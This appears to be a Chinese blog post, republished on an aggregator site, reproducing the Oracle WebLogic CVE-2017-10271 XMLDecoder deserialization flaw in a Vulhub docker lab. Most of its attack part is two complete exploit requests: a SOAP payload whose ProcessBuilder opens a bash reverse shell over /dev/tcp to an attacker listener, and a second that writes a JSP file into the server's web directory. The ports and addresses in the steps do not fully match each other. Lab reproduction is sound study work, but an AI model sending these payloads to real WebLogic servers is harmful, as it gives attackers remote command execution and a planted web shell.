Vulhub漏洞CVE-2017-10271复现

Posted kbhome

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulhub漏洞CVE-2017-10271复现相关的知识,希望对你有一定的参考价值。

Vulhub漏洞CVE-2017-10271复现

前提:已安装好docker容器,vulhub靶场

靶机(虚拟机):IP:192.168.73.131 攻击机:win10、ip略

  1. 进入CVE-2017-10271漏洞目录

    cd vulhub-master/weblogic/CVE-2017-10271

    技术图片

  2. 启动docker容器服务

    service docker start

  3. 使用docker编译启动漏洞环境

    docker-compose up -d

    技术图片

  4. 查看容器状态,发现开启了7001端口

    技术图片

  5. 访问端口,查看是否搭建成功。如下图为成功搭建

    技术图片

  6. 访问该路径下的”/wls-wsat/CoordinatorPortType11“目录,如下图就说明存在漏洞

    技术图片

  7. 靶机漏洞环境搭建好了以后,攻击机用端口8888开启nc监听

    nc -l -p 8888

    技术图片

  8. 构建poc:(白嫖的大神的,自己现在写不出来)

    POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.43.53:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.43.248/9999 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

  9. 使用bp向靶机发送poc,host主机地址就是靶机的地址,记得加上端口号。返回的是攻击机的地址和攻击机开启监听的端口。

    技术图片

    技术图片

  10. 发现监听成功反弹shell,说明构建poc攻击有效。

    技术图片

  11. 在之前的poc基础之上继续构建写入shell,发送(一瓢,嫖到底)

    POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.43.53:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 639

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

    技术图片

  12. 访问shell,成功

    http://192.168.73.131:7001/bea_wls_internal/test.jsp

    技术图片

以上是关于Vulhub漏洞CVE-2017-10271复现的主要内容,如果未能解决你的问题,请参考以下文章

Weblogic(CVE-2017-10271)漏洞复现

IDEA+docker,进行远程漏洞调试(weblogic)

Weblogic(CVE-2017-10271)漏洞复现

Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)

WebLogic中WLS 组件漏洞(CVE-2017-10271)专项检测工具

(CVE-2017-10271 ) Weblogic XMLDecoder 反序列化